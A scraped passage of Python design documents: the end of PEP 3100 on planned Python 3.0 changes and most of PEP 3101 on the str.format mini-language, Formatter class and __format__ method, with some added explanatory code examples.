This style should be used for all new files; existing files can be
updated only if there is no hope to ever merge a particular file from
the Python 2 HEAD. Within a file, the indentation style should be
consistent. No other style guide changes are planned ATM.
Core language
True division becomes default behavior PEP 238 [done]
exec as a statement is not worth it – make it a function [done]
Add optional declarations for static typing PEP 3107 [10] [done]
Support only new-style classes; classic classes will be gone [1] [done]
Replace print by a function [14] PEP 3105 [done]
The softspace attribute of files goes away. [done]
Use except E1, E2, E3 as err: if you want the error variable. [3] [done]
None becomes a keyword [4]; also True and False [done]
... to become a general expression element [16] [done]
as becomes a keyword [5] (starting in 2.6 already) [done]
Have list comprehensions be syntactic sugar for passing an
equivalent generator expression to list(); as a consequence the
loop variable will no longer be exposed PEP 289 [done]
Comparisons other than == and != between disparate types
will raise an exception unless explicitly supported by the type [6] [done]
floats will not be acceptable as arguments in place of ints for operations
where floats are inadvertently accepted (PyArg_ParseTuple() i & l formats)
Remove from … import * at function scope. [done] This means that functions
can always be optimized and support for unoptimized functions can go away.
Imports PEP 328
Imports will be absolute by default. [done]
Relative imports must be explicitly specified. [done]
Indirection entries in sys.modules (i.e., a value of None for
A.string means to use the top-level string module) will not be
supported.
__init__.py might become optional in sub-packages? __init__.py will still
be required for top-level packages.
Cleanup the Py_InitModule() variants {,3,4} (also import and parser APIs)
Cleanup the APIs exported in pythonrun, etc.
Some expressions will require parentheses that didn’t in 2.x:
List comprehensions will require parentheses around the iterables.
This will make list comprehensions more similar to generator comprehensions.
[x for x in 1, 2] will need to be: [x for x in (1, 2)] [done]
Lambdas may have to be parenthesized PEP 308 [NO]
In order to get rid of the confusion between __builtin__ and __builtins__,
it was decided to rename __builtin__ (the module) to builtins, and to leave
__builtins__ (the sandbox hook) alone. [33] [34] [done]
Attributes on functions of the form func_whatever will be renamed
__whatever__ [17] [done]
Set literals and comprehensions [19] [20] [done]
{x} means set([x]); {x, y} means set([x, y]).
{F(x) for x in S if P(x)} means set(F(x) for x in S if P(x)).
NB. {range(x)} means set([range(x)]), NOT set(range(x)).
There’s no literal for an empty set; use set() (or {1}&{2} :-).
There’s no frozenset literal; they are too rarely needed.
The __nonzero__ special method will be renamed to __bool__
and have to return a bool. The typeobject slot will be called
tp_bool [23] [done]
Dict comprehensions, as first proposed in PEP 274 [done]
{K(x): V(x) for x in S if P(x)} means dict((K(x), V(x)) for x in S if P(x)).
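For readers unfamiliar with these forms, here is a small runnable illustration
of the set and dict literals and comprehensions just listed (the variable
names and values are invented for this sketch; it is not part of the plan itself):
words = ['spam', 'eggs', 'spam']
pair = {1, 2}                            # set literal, i.e. set([1, 2])
unique = {w for w in words}              # set comprehension -> {'spam', 'eggs'}
lengths = {w: len(w) for w in words}     # dict comprehension -> {'spam': 4, 'eggs': 4}
empty = set()                            # {} is still an empty dict, not a set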
To be removed:
String exceptions: use instances of an Exception class [2] [done]
raise Exception, "message": use raise Exception("message") [12]
[done]
x: use repr(x) [2] [done]
The <> operator: use != instead [3] [done]
The __mod__ and __divmod__ special methods on float. [they should stay] [21]
Drop unbound methods [7] [26] [done]
METH_OLDARGS [done]
WITH_CYCLE_GC [done]
__getslice__, __setslice__, __delslice__ [32];
remove slice opcodes and use slice objects. [done]
__oct__, __hex__: use __index__ in oct() and hex()
instead. [done]
__methods__ and __members__ [done]
C APIs (see code):
PyFloat_AsString, PyFloat_AsReprString, PyFloat_AsStringEx,
PySequence_In, PyEval_EvalFrame, PyEval_CallObject,
_PyObject_Del, _PyObject_GC_Del, _PyObject_GC_Track, _PyObject_GC_UnTrack
PyString_AsEncodedString, PyString_AsDecodedString
PyArg_NoArgs, PyArg_GetInt, intargfunc, intintargfunc
PyImport_ReloadModule ?
Atomic Types
Remove distinction between int and long types; ‘long’ built-in type and
literals with ‘L’ or ‘l’ suffix disappear [1] [done]
Make all strings be Unicode, and have a separate bytes() type [1]
The new string type will be called ‘str’. See PEP 3137. [done]
Return iterable views instead of lists where appropriate for atomic
type methods (e.g. dict.keys(), dict.values(),
dict.items(), etc.); iter* methods will be removed. [done]
Make string.join() stringify its arguments? [18] [NO]
Fix open() so it returns a ValueError if the mode is bad rather than IOError.
[done]
To be removed:
basestring.find() and basestring.rfind(); use basestring.index()
or basestring.[r]partition() or
basestring.rindex() in a try/except block??? [13] [UNLIKELY]
file.xreadlines() method [31] [done]
dict.setdefault()? [15] [UNLIKELY]
dict.has_key() method; use in operator [done]
list.sort() and builtin.sorted() methods: eliminate cmp
parameter [27] [done]
Built-in Namespace
Make built-ins return an iterator where appropriate (e.g. range(),
zip(), map(), filter(), etc.) [done]
Remove input() and rename raw_input() to input().
If you need the old input(), use eval(input()). [done]
Introduce trunc(), which would call the __trunc__() method on its
argument; suggested use is for objects like float where calling __int__()
has data loss, but an integral representation is still desired? [8] [done]
Exception hierarchy changes PEP 352 [done]
Add a bin() function for a binary representation of integers [done]
To be removed:
apply(): use f(*args, **kw) instead [2] [done]
buffer(): must die (use a bytes() type instead) (?) [2] [done]
callable(): just use isinstance(x, collections.Callable) (?) [2] [done]
compile(): put in sys (or perhaps in a module of its own) [2]
coerce(): no longer needed [2] [done]
execfile(), reload(): use exec() [2] [done]
intern(): put in sys [2], [22] [done]
reduce(): put in functools, a loop is more readable most of the
time [2], [9] [done]
xrange(): use range() instead [1] [See range() above] [done]
StandardError: this is a relic from the original exception hierarchy;
subclass Exception instead. [done]
Standard library
Reorganize the standard library to not be as shallow?
Move test code to where it belongs, there will be no more test() functions
in the standard library
Convert all tests to use either doctest or unittest.
For the procedures of standard library improvement, see PEP 3001
To be removed:
The sets module. [done]
stdlib modules to be removed
see docstrings and comments in the source
macfs [to do]
new, reconvert, stringold, xmllib,
pcre, pypcre, strop [all done]
see PEP 4
buildtools,
mimetools,
multifile,
rfc822,
[to do]
mpz, posixfile, regsub, rgbimage,
sha, statcache, sv, TERMIOS, timing [done]
cfmfile, gopherlib, md5, MimeWriter, mimify [done]
cl, sets, xreadlines, rotor, whrandom [done]
Everything in lib-old PEP 4 [done]
Para, addpack, cmp, cmpcache, codehack,
dircmp, dump, find, fmt, grep,
lockfile, newdir, ni, packmail, poly,
rand, statcache, tb, tzparse, util,
whatsound, whrandom, zmod
sys.exitfunc: use atexit module instead [28],
[35] [done]
sys.exc_type, sys.exc_values, sys.exc_traceback:
not thread-safe; use sys.exc_info() or an attribute
of the exception [2] [11] [28] [done]
sys.exc_clear: Python 3’s except statements provide the same
functionality [24] PEP 3110 [28] [done]
array.read, array.write [30]
operator.isCallable : callable() built-in is being removed
[29] [36] [done]
operator.sequenceIncludes : redundant thanks to
operator.contains [29] [36] [done]
In the thread module, the acquire_lock() and release_lock() aliases
for the acquire() and release() methods on lock objects.
(Probably also just remove the thread module as a public API,
in favor of always using threading.py.)
UserXyz classes, in favour of XyzMixins.
Remove the unreliable empty() and full() methods from Queue.py? [25]
Remove jumpahead() from the random API? [25]
Make the primitive for random be something generating random bytes
rather than random floats? [25]
Get rid of Cookie.SerialCookie and Cookie.SmartCookie? [25]
Modify the heapq.heapreplace() API to compare the new value to the top
of the heap? [25]
Outstanding Issues
Require C99, so we can use // comments, named initializers, declare variables
without introducing a new scope, among other benefits. (Also better support
for IEEE floating point issues like NaN and infinities?)
Remove support for old systems, including: BeOS, RISCOS, (SGI) Irix, Tru64
References
[1] (1, 2, 3, 4, 5)
PyCon 2003 State of the Union:
https://legacy.python.org/doc/essays/ppt/pycon2003/pycon2003.ppt
[2] (1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11)
Python Regrets:
https://legacy.python.org/doc/essays/ppt/regrets/PythonRegrets.pdf
[3] (1, 2)
Python Wiki:
https://wiki.python.org/moin/Python3.0
[4]
python-dev email (“Constancy of None”)
https://mail.python.org/pipermail/python-dev/2004-July/046294.html
[5]
python-dev email (’ “as” to be a keyword?’)
https://mail.python.org/pipermail/python-dev/2004-July/046316.html
[6]
python-dev email (“Comparing heterogeneous types”)
https://mail.python.org/pipermail/python-dev/2004-June/045111.html
[7]
python-dev email (“Let’s get rid of unbound methods”)
https://mail.python.org/pipermail/python-dev/2005-January/050625.html
[8]
python-dev email (“Fixing _PyEval_SliceIndex so that integer-like
objects can be used”)
https://mail.python.org/pipermail/python-dev/2005-February/051674.html
[9]
Guido’s blog (“The fate of reduce() in Python 3000”)
https://www.artima.com/weblogs/viewpost.jsp?thread=98196
[10]
Guido’s blog (“Python Optional Typechecking Redux”)
https://www.artima.com/weblogs/viewpost.jsp?thread=89161
[11]
python-dev email (“anonymous blocks”)
https://mail.python.org/pipermail/python-dev/2005-April/053060.html
[12]
python-dev email (“PEP 8: exception style”)
https://mail.python.org/pipermail/python-dev/2005-August/055190.html
[13]
python-dev email (Remove str.find in 3.0?)
https://mail.python.org/pipermail/python-dev/2005-August/055705.html
[14]
python-dev email (Replacement for print in Python 3.0)
https://mail.python.org/pipermail/python-dev/2005-September/056154.html
[15]
python-dev email (“defaultdict”)
https://mail.python.org/pipermail/python-dev/2006-February/061261.html
[16]
python-3000 email
https://mail.python.org/pipermail/python-3000/2006-April/000996.html
[17]
python-3000 email (“Pronouncement on parameter lists”)
https://mail.python.org/pipermail/python-3000/2006-April/001175.html
[18]
python-3000 email (“More wishful thinking”)
https://mail.python.org/pipermail/python-3000/2006-April/000810.html
[19]
python-3000 email (“sets in P3K?”)
https://mail.python.org/pipermail/python-3000/2006-April/001286.html
[20]
python-3000 email (“sets in P3K?”)
https://mail.python.org/pipermail/python-3000/2006-May/001666.html
[21]
python-3000 email (“bug in modulus?”)
https://mail.python.org/pipermail/python-3000/2006-May/001735.html
[22]
SF patch “sys.id() and sys.intern()”
https://bugs.python.org/issue1601678
[23]
python-3000 email (“__nonzero__ vs. __bool__”)
https://mail.python.org/pipermail/python-3000/2006-November/004524.html
[24]
python-3000 email (“Pre-peps on raise and except changes”)
https://mail.python.org/pipermail/python-3000/2007-February/005672.html
[25] (1, 2, 3, 4, 5)
python-3000 email (“Py3.0 Library Ideas”)
https://mail.python.org/pipermail/python-3000/2007-February/005726.html
[26]
python-dev email (“Should we do away with unbound methods in Py3k?”)
https://mail.python.org/pipermail/python-dev/2007-November/075279.html
[27]
python-dev email (“Mutable sequence .sort() signature”)
https://mail.python.org/pipermail/python-dev/2008-February/076818.html
[28] (1, 2, 3)
Python docs (sys – System-specific parameters and functions)
https://docs.python.org/release/2.6/library/sys.html
[29] (1, 2)
Python docs (operator – Standard operators as functions)
https://docs.python.org/release/2.6/library/operator.html
[30]
Python docs (array – Efficient arrays of numeric values)
https://docs.python.org/release/2.6/library/array.html
[31]
Python docs (File objects)
https://docs.python.org/release/2.6/library/stdtypes.html
[32]
Python docs (Additional methods for emulation of sequence types)
https://docs.python.org/release/2.6/reference/datamodel.html#additional-methods-for-emulation-of-sequence-types
[33]
Approach to resolving __builtin__ vs __builtins__
https://mail.python.org/pipermail/python-3000/2007-March/006161.html
[34]
New name for __builtins__
https://mail.python.org/pipermail/python-dev/2007-November/075388.html
[35]
Patch to remove sys.exitfunc
https://github.com/python/cpython/issues/44715
[36] (1, 2)
Remove deprecated functions from operator
https://github.com/python/cpython/issues/43602
Copyright
This document has been placed in the public domain.
| Final | PEP 3100 – Miscellaneous Python 3.0 Plans | Process | This PEP, previously known as PEP 3000, describes smaller scale changes
and new features for which no separate PEP is written yet, all targeted
for Python 3000. |
PEP 3101 – Advanced String Formatting
Author:
Talin <viridia at gmail.com>
Status:
Final
Type:
Standards Track
Created:
16-Apr-2006
Python-Version:
3.0
Post-History:
28-Apr-2006, 06-May-2006, 10-Jun-2007, 14-Aug-2007, 14-Sep-2008
Table of Contents
Abstract
Rationale
Specification
String Methods
Format Strings
Simple and Compound Field Names
Format Specifiers
Standard Format Specifiers
Explicit Conversion Flag
Controlling Formatting on a Per-Type Basis
User-Defined Formatting
Formatter Methods
Customizing Formatters
Error handling
Alternate Syntax
Alternate Feature Proposals
Security Considerations
Sample Implementation
Backwards Compatibility
References
Copyright
Abstract
This PEP proposes a new system for built-in string formatting
operations, intended as a replacement for the existing ‘%’ string
formatting operator.
Rationale
Python currently provides two methods of string interpolation:
The ‘%’ operator for strings. [1]
The string.Template module. [2]
The primary scope of this PEP concerns proposals for built-in
string formatting operations (in other words, methods of the
built-in string type).
The ‘%’ operator is primarily limited by the fact that it is a
binary operator, and therefore can take at most two arguments.
One of those arguments is already dedicated to the format string,
leaving all other variables to be squeezed into the remaining
argument. The current practice is to use either a dictionary or a
tuple as the second argument, but as many people have commented
[3], this lacks flexibility. The “all or nothing” approach
(meaning that one must choose between only positional arguments,
or only named arguments) is felt to be overly constraining.
While there is some overlap between this proposal and
string.Template, it is felt that each serves a distinct need,
and that one does not obviate the other. This proposal is for
a mechanism which, like ‘%’, is efficient for small strings
which are only used once, so, for example, compilation of a
string into a template is not contemplated in this proposal,
although the proposal does take care to define format strings
and the API in such a way that an efficient template package
could reuse the syntax and even some of the underlying
formatting code.
Specification
The specification will consist of the following parts:
Specification of a new formatting method to be added to the
built-in string class.
Specification of functions and flag values to be added to
the string module, so that the underlying formatting engine
can be used with additional options.
Specification of a new syntax for format strings.
Specification of a new set of special methods to control the
formatting and conversion of objects.
Specification of an API for user-defined formatting classes.
Specification of how formatting errors are handled.
Note on string encodings: When discussing this PEP in the context
of Python 3.0, it is assumed that all strings are unicode strings,
and that the use of the word ‘string’ in the context of this
document will generally refer to a Python 3.0 string, which is
the same as Python 2.x unicode object.
In the context of Python 2.x, the use of the word ‘string’ in this
document refers to an object which may either be a regular string
or a unicode object. All of the function call interfaces
described in this PEP can be used for both strings and unicode
objects, and in all cases there is sufficient information
to be able to properly deduce the output string type (in
other words, there is no need for two separate APIs).
In all cases, the type of the format string dominates - that
is, the result of the conversion will always result in an object
that contains the same representation of characters as the
input format string.
String Methods
The built-in string class (and also the unicode class in 2.6) will
gain a new method, ‘format’, which takes an arbitrary number of
positional and keyword arguments:
"The story of {0}, {1}, and {c}".format(a, b, c=d)
Within a format string, each positional argument is identified
with a number, starting from zero, so in the above example, ‘a’ is
argument 0 and ‘b’ is argument 1. Each keyword argument is
identified by its keyword name, so in the above example, ‘c’ is
used to refer to the third argument.
There is also a global built-in function, ‘format’ which formats
a single value:
print(format(10.0, "7.3g"))
This function is described in a later section.
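As a concrete, runnable illustration of the two forms above (the example
values 'Alice', 'Bob', 'Carol' are invented here, not part of the PEP):
a, b, d = 'Alice', 'Bob', 'Carol'
print("The story of {0}, {1}, and {c}".format(a, b, c=d))
# -> The story of Alice, Bob, and Carol
print(format(10.0, "7.3g"))
# -> '     10' (numbers are right-aligned in the 7-character field by default)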
Format Strings
Format strings consist of intermingled character data and markup.
Character data is data which is transferred unchanged from the
format string to the output string; markup is not transferred from
the format string directly to the output, but instead is used to
define ‘replacement fields’ that describe to the format engine
what should be placed in the output string in place of the markup.
Brace characters (‘curly braces’) are used to indicate a
replacement field within the string:
"My name is {0}".format('Fred')
The result of this is the string:
"My name is Fred"
Braces can be escaped by doubling:
"My name is {0} :-{{}}".format('Fred')
Which would produce:
"My name is Fred :-{}"
The element within the braces is called a ‘field’. Fields consist
of a ‘field name’, which can either be simple or compound, and an
optional ‘format specifier’.
Simple and Compound Field Names
Simple field names are either names or numbers. If numbers, they
must be valid base-10 integers; if names, they must be valid
Python identifiers. A number is used to identify a positional
argument, while a name is used to identify a keyword argument.
A compound field name is a combination of multiple simple field
names in an expression:
"My name is {0.name}".format(open('out.txt', 'w'))
This example shows the use of the ‘getattr’ or ‘dot’ operator
in a field expression. The dot operator allows an attribute of
an input value to be specified as the field value.
Unlike some other programming languages, you cannot embed arbitrary
expressions in format strings. This is by design - the types of
expressions that you can use is deliberately limited. Only two operators
are supported: the ‘.’ (getattr) operator, and the ‘[]’ (getitem)
operator. The reason for allowing these operators is that they don’t
normally have side effects in non-pathological code.
An example of the ‘getitem’ syntax:
"My name is {0[name]}".format(dict(name='Fred'))
It should be noted that the use of ‘getitem’ within a format string
is much more limited than its conventional usage. In the above example,
the string ‘name’ really is the literal string ‘name’, not a variable
named ‘name’. The rules for parsing an item key are very simple.
If it starts with a digit, then it is treated as a number, otherwise
it is used as a string.
Because keys are not quote-delimited, it is not possible to
specify arbitrary dictionary keys (e.g., the strings “10” or
“:-]”) from within a format string.
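A brief illustration of the key-parsing rule just described (the dictionary
contents are invented for the example):
data = {'name': 'Fred', 0: 'zero'}
print("{0[name]}".format(data))   # 'name' is the literal string key -> Fred
print("{0[0]}".format(data))      # starts with a digit, so it is the integer key 0 -> zero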
Implementation note: The implementation of this proposal is
not required to enforce the rule about a simple or dotted name
being a valid Python identifier. Instead, it will rely on the
getattr function of the underlying object to throw an exception if
the identifier is not legal. The str.format() function will have
a minimalist parser which only attempts to figure out when it is
“done” with an identifier (by finding a ‘.’ or a ‘]’, or ‘}’,
etc.).
Format Specifiers
Each field can also specify an optional set of ‘format
specifiers’ which can be used to adjust the format of that field.
Format specifiers follow the field name, with a colon (‘:’)
character separating the two:
"My name is {0:8}".format('Fred')
The meaning and syntax of the format specifiers depends on the
type of object that is being formatted, but there is a standard
set of format specifiers used for any object that does not
override them.
Format specifiers can themselves contain replacement fields.
For example, a field whose field width is itself a parameter
could be specified via:
"{0:{1}}".format(a, b)
These ‘internal’ replacement fields can only occur in the format
specifier part of the replacement field. Internal replacement fields
cannot themselves have format specifiers. This implies also that
replacement fields cannot be nested to arbitrary levels.
Note that the doubled ‘}’ at the end, which would normally be
escaped, is not escaped in this case. The reason is because
the ‘{{’ and ‘}}’ syntax for escapes is only applied when used
outside of a format field. Within a format field, the brace
characters always have their normal meaning.
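A short runnable sketch of such a parameterized field width (the values
here are arbitrary and chosen only for illustration):
value, width, precision = 3.14159, 10, 3
print("{0:{1}}".format(value, width))                  # width taken from argument 1
print("{0:{1}.{2}f}".format(value, width, precision))  # -> '     3.142'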
The syntax for format specifiers is open-ended, since a class
can override the standard format specifiers. In such cases,
the str.format() method merely passes all of the characters between
the first colon and the matching brace to the relevant underlying
formatting method.
Standard Format Specifiers
If an object does not define its own format specifiers, a standard
set of format specifiers is used. These are similar in concept to
the format specifiers used by the existing ‘%’ operator, however
there are also a number of differences.
The general form of a standard format specifier is:
[[fill]align][sign][#][0][minimumwidth][.precision][type]
The brackets ([]) indicate an optional element.
Then the optional align flag can be one of the following:
'<' - Forces the field to be left-aligned within the available
space (This is the default.)
'>' - Forces the field to be right-aligned within the
available space.
'=' - Forces the padding to be placed after the sign (if any)
but before the digits. This is used for printing fields
in the form '+000000120'. This alignment option is only
valid for numeric types.
'^' - Forces the field to be centered within the available
space.
Note that unless a minimum field width is defined, the field
width will always be the same size as the data to fill it, so
that the alignment option has no meaning in this case.
The optional ‘fill’ character defines the character to be used to
pad the field to the minimum width. The fill character, if present,
must be followed by an alignment flag.
The ‘sign’ option is only valid for numeric types, and can be one
of the following:
'+' - indicates that a sign should be used for both
positive as well as negative numbers
'-' - indicates that a sign should be used only for negative
numbers (this is the default behavior)
' ' - indicates that a leading space should be used on
positive numbers
If the ‘#’ character is present, integers use the ‘alternate form’
for formatting. This means that binary, octal, and hexadecimal
output will be prefixed with ‘0b’, ‘0o’, and ‘0x’, respectively.
‘width’ is a decimal integer defining the minimum field width. If
not specified, then the field width will be determined by the
content.
If the width field is preceded by a zero (‘0’) character, this enables
zero-padding. This is equivalent to an alignment type of ‘=’ and a
fill character of ‘0’.
The ‘precision’ is a decimal number indicating how many digits
should be displayed after the decimal point in a floating point
conversion. For non-numeric types the field indicates the maximum
field size - in other words, how many characters will be used from
the field content. The precision is ignored for integer conversions.
Finally, the ‘type’ determines how the data should be presented.
The available integer presentation types are:
'b' - Binary. Outputs the number in base 2.
'c' - Character. Converts the integer to the corresponding
Unicode character before printing.
'd' - Decimal Integer. Outputs the number in base 10.
'o' - Octal format. Outputs the number in base 8.
'x' - Hex format. Outputs the number in base 16, using
lower-case letters for the digits above 9.
'X' - Hex format. Outputs the number in base 16, using
upper-case letters for the digits above 9.
'n' - Number. This is the same as 'd', except that it uses the
current locale setting to insert the appropriate
number separator characters.
'' (None) - the same as 'd'
The available floating point presentation types are:
'e' - Exponent notation. Prints the number in scientific
notation using the letter 'e' to indicate the exponent.
'E' - Exponent notation. Same as 'e' except it converts the
number to uppercase.
'f' - Fixed point. Displays the number as a fixed-point
number.
'F' - Fixed point. Same as 'f' except it converts the number
to uppercase.
'g' - General format. This prints the number as a fixed-point
number, unless the number is too large, in which case
it switches to 'e' exponent notation.
'G' - General format. Same as 'g' except switches to 'E'
if the number gets too large.
'n' - Number. This is the same as 'g', except that it uses the
current locale setting to insert the appropriate
number separator characters.
'%' - Percentage. Multiplies the number by 100 and displays
in fixed ('f') format, followed by a percent sign.
'' (None) - similar to 'g', except that it prints at least one
digit after the decimal point.
Objects are able to define their own format specifiers to
replace the standard ones. An example is the ‘datetime’ class,
whose format specifiers might look something like the
arguments to the strftime() function:
"Today is: {0:%a %b %d %H:%M:%S %Y}".format(datetime.now())
For all built-in types, an empty format specification will produce
the equivalent of str(value). It is recommended that objects
defining their own format specifiers follow this convention as
well.
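For concreteness, a few runnable examples of the standard specifiers
described in this section (the expected output is shown in comments):
print(format(42, 'b'))            # 101010      (binary)
print(format(255, '#x'))          # 0xff        (alternate-form hex)
print(format(42, '+d'))           # +42         (always show the sign)
print(format(3.14159, '08.3f'))   # 0003.142    (zero padding, width 8, precision 3)
print(format('Fred', '*^10'))     # ***Fred***  (fill '*', centered, width 10)
print(format(1234, ''))           # 1234        (empty spec is equivalent to str())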
Explicit Conversion Flag
The explicit conversion flag is used to transform the format field value
before it is formatted. This can be used to override the type-specific
formatting behavior, and format the value as if it were a more
generic type. Currently, two explicit conversion flags are
recognized:
!r - convert the value to a string using repr().
!s - convert the value to a string using str().
These flags are placed before the format specifier:
"{0!r:20}".format("Hello")
In the preceding example, the string “Hello” will be printed, with quotes,
in a field of at least 20 characters width.
A custom Formatter class can define additional conversion flags.
The built-in formatter will raise a ValueError if an invalid
conversion flag is specified.
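A small runnable example of the two conversion flags (the field widths are
arbitrary):
print("{0!s:<10}|".format('Hi'))   # str():  'Hi        |'
print("{0!r:<10}|".format('Hi'))   # repr(): "'Hi'      |"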
Controlling Formatting on a Per-Type Basis
Each Python type can control formatting of its instances by defining
a __format__ method. The __format__ method is responsible for
interpreting the format specifier, formatting the value, and
returning the resulting string.
The new, global built-in function ‘format’ simply calls this special
method, similar to how len() and str() simply call their respective
special methods:
def format(value, format_spec):
    return value.__format__(format_spec)
It is safe to call this function with a value of “None” (because the
“None” value in Python is an object and can have methods.)
Several built-in types, including ‘str’, ‘int’, ‘float’, and ‘object’
define __format__ methods. This means that if you derive from any of
those types, your class will know how to format itself.
The object.__format__ method is the simplest: It simply converts the
object to a string, and then calls format again:
class object:
    def __format__(self, format_spec):
        return format(str(self), format_spec)
The __format__ methods for ‘int’ and ‘float’ will do numeric formatting
based on the format specifier. In some cases, these formatting
operations may be delegated to other types. So for example, in the case
where the ‘int’ formatter sees a format type of ‘f’ (meaning ‘float’)
it can simply cast the value to a float and call format() again.
Any class can override the __format__ method to provide custom
formatting for that type:
class AST:
    def __format__(self, format_spec):
        ...
Note for Python 2.x: The ‘format_spec’ argument will be either
a string object or a unicode object, depending on the type of the
original format string. The __format__ method should test the type
of the specifiers parameter to determine whether to return a string or
unicode object. It is the responsibility of the __format__ method
to return an object of the proper type.
Note that the ‘explicit conversion’ flag mentioned above is not passed
to the __format__ method. Rather, it is expected that the conversion
specified by the flag will be performed before calling __format__.
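As an illustrative sketch only (the Temperature class and its trailing-'F'
specifier are invented for this example and are not part of the PEP), a type
might implement __format__ along these lines:
class Temperature:
    def __init__(self, celsius):
        self.celsius = celsius

    def __format__(self, format_spec):
        # Treat a trailing 'F' as a hypothetical "render in Fahrenheit" flag;
        # delegate everything else to ordinary float formatting.
        if format_spec.endswith('F'):
            return format(self.celsius * 9.0 / 5.0 + 32, format_spec[:-1] + 'f')
        return format(self.celsius, format_spec or '.1f')

t = Temperature(21.5)
print("{0:.1f} C is {0:.1F} F".format(t))   # 21.5 C is 70.7 F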
User-Defined Formatting
There will be times when customizing the formatting of fields
on a per-type basis is not enough. An example might be a
spreadsheet application, which displays hash marks ‘#’ when a value
is too large to fit in the available space.
For more powerful and flexible formatting, access to the underlying
format engine can be obtained through the ‘Formatter’ class that
lives in the ‘string’ module. This class takes additional options
which are not accessible via the normal str.format method.
An application can subclass the Formatter class to create its own
customized formatting behavior.
The PEP does not attempt to exactly specify all methods and
properties defined by the Formatter class; instead, those will be
defined and documented in the initial implementation. However, this
PEP will specify the general requirements for the Formatter class,
which are listed below.
Although string.format() does not directly use the Formatter class
to do formatting, both use the same underlying implementation. The
reason that string.format() does not use the Formatter class directly
is because “string” is a built-in type, which means that all of its
methods must be implemented in C, whereas Formatter is a Python
class. Formatter provides an extensible wrapper around the same
C functions as are used by string.format().
Formatter Methods
The Formatter class takes no initialization arguments:
fmt = Formatter()
The public API methods of class Formatter are as follows:
-- format(format_string, *args, **kwargs)
-- vformat(format_string, args, kwargs)
‘format’ is the primary API method. It takes a format template,
and an arbitrary set of positional and keyword arguments.
‘format’ is just a wrapper that calls ‘vformat’.
‘vformat’ is the function that does the actual work of formatting. It
is exposed as a separate function for cases where you want to pass in
a predefined dictionary of arguments, rather than unpacking and
repacking the dictionary as individual arguments using the *args and
**kwds syntax. ‘vformat’ does the work of breaking up the format
template string into character data and replacement fields. It calls
the overridable methods described below (such as ‘get_value’) as
appropriate.
Formatter defines the following overridable methods:
-- get_value(key, args, kwargs)
-- check_unused_args(used_args, args, kwargs)
-- format_field(value, format_spec)
‘get_value’ is used to retrieve a given field value. The ‘key’ argument
will be either an integer or a string. If it is an integer, it represents
the index of the positional argument in ‘args’; If it is a string, then
it represents a named argument in ‘kwargs’.
The ‘args’ parameter is set to the list of positional arguments to
‘vformat’, and the ‘kwargs’ parameter is set to the dictionary of
keyword arguments.
For compound field names, these functions are only called for the
first component of the field name; subsequent components are handled
through normal attribute and indexing operations.
So for example, the field expression ‘0.name’ would cause ‘get_value’
to be called with a ‘key’ argument of 0. The ‘name’ attribute will be
looked up after ‘get_value’ returns by calling the built-in ‘getattr’
function.
If the index or keyword refers to an item that does not exist, then an
IndexError/KeyError should be raised.
‘check_unused_args’ is used to implement checking for unused arguments
if desired. The arguments to this function are the set of all argument
keys that were actually referred to in the format string (integers for
positional arguments, and strings for named arguments), and a reference
to the args and kwargs that was passed to vformat. The set of unused
args can be calculated from these parameters. ‘check_unused_args’
is assumed to throw an exception if the check fails.
‘format_field’ simply calls the global ‘format’ built-in. The method
is provided so that subclasses can override it.
To get a better understanding of how these functions relate to each
other, here is pseudocode that explains the general operation of
vformat:
def vformat(format_string, args, kwargs):
    # Output buffer and set of used args
    buffer = StringIO.StringIO()
    used_args = set()
    # Tokens are either format fields or literal strings
    for token in self.parse(format_string):
        if is_format_field(token):
            # Split the token into field value and format spec
            field_spec, _, format_spec = token.partition(":")
            # Check for explicit type conversion
            explicit, _, field_spec = field_spec.rpartition("!")
            # 'first_part' is the part before the first '.' or '['
            # Assume that 'get_first_part' returns either an int or
            # a string, depending on the syntax.
            first_part = get_first_part(field_spec)
            value = self.get_value(first_part, args, kwargs)
            # Record the fact that we used this arg
            used_args.add(first_part)
            # Handle [subfield] or .subfield. Assume that 'components'
            # returns an iterator of the various subfields, not including
            # the first part.
            for comp in components(field_spec):
                value = resolve_subfield(value, comp)
            # Handle explicit type conversion
            if explicit == 'r':
                value = repr(value)
            elif explicit == 's':
                value = str(value)
            # Call the global 'format' function and write out the converted
            # value.
            buffer.write(self.format_field(value, format_spec))
        else:
            buffer.write(token)
    self.check_unused_args(used_args, args, kwargs)
    return buffer.getvalue()
Note that the actual algorithm of the Formatter class (which will be
implemented in C) may not be the one presented here. (It’s likely
that the actual implementation won’t be a ‘class’ at all - rather,
vformat may just call a C function which accepts the other overridable
methods as arguments.) The primary purpose of this code example is to
illustrate the order in which overridable methods are called.
Customizing Formatters
This section describes some typical ways that Formatter objects
can be customized.
To support alternative format-string syntax, the ‘vformat’ method
can be overridden to alter the way format strings are parsed.
One common desire is to support a ‘default’ namespace, so that
you don’t need to pass in keyword arguments to the format()
method, but can instead use values in a pre-existing namespace.
This can easily be done by overriding get_value() as follows:
class NamespaceFormatter(Formatter):
    def __init__(self, namespace={}):
        Formatter.__init__(self)
        self.namespace = namespace

    def get_value(self, key, args, kwds):
        if isinstance(key, str):
            try:
                # Check explicitly passed arguments first
                return kwds[key]
            except KeyError:
                return self.namespace[key]
        else:
            return Formatter.get_value(self, key, args, kwds)
One can use this to easily create a formatting function that allows
access to global variables, for example:
fmt = NamespaceFormatter(globals())
greeting = "hello"
print(fmt.format("{greeting}, world!"))
A similar technique can be done with the locals() dictionary to
gain access to the locals dictionary.
It would also be possible to create a ‘smart’ namespace formatter
that could automatically access both locals and globals through
snooping of the calling stack. Due to the need for compatibility
with the different versions of Python, such a capability will not
be included in the standard library, however it is anticipated
that someone will create and publish a recipe for doing this.
Another type of customization is to change the way that built-in
types are formatted by overriding the ‘format_field’ method. (For
non-built-in types, you can simply define a __format__ special
method on that type.) So for example, you could override the
formatting of numbers to output scientific notation when needed.
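As a hedged sketch of that idea (string.Formatter is the class described in
this PEP; the subclass name and the numeric thresholds below are invented for
the example):
from string import Formatter

class SciFormatter(Formatter):
    def format_field(self, value, format_spec):
        # With no explicit specifier, show very large or very small floats
        # in scientific notation; otherwise fall back to the default behavior.
        if isinstance(value, float) and not format_spec:
            if value != 0 and not (1e-4 <= abs(value) < 1e6):
                return format(value, 'e')
        return Formatter.format_field(self, value, format_spec)

fmt = SciFormatter()
print(fmt.format("{0} vs {1}", 12345678.0, 2.5))   # 1.234568e+07 vs 2.5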
Error handling
There are two classes of exceptions which can occur during formatting:
exceptions generated by the formatter code itself, and exceptions
generated by user code (such as a field object’s ‘getattr’ function).
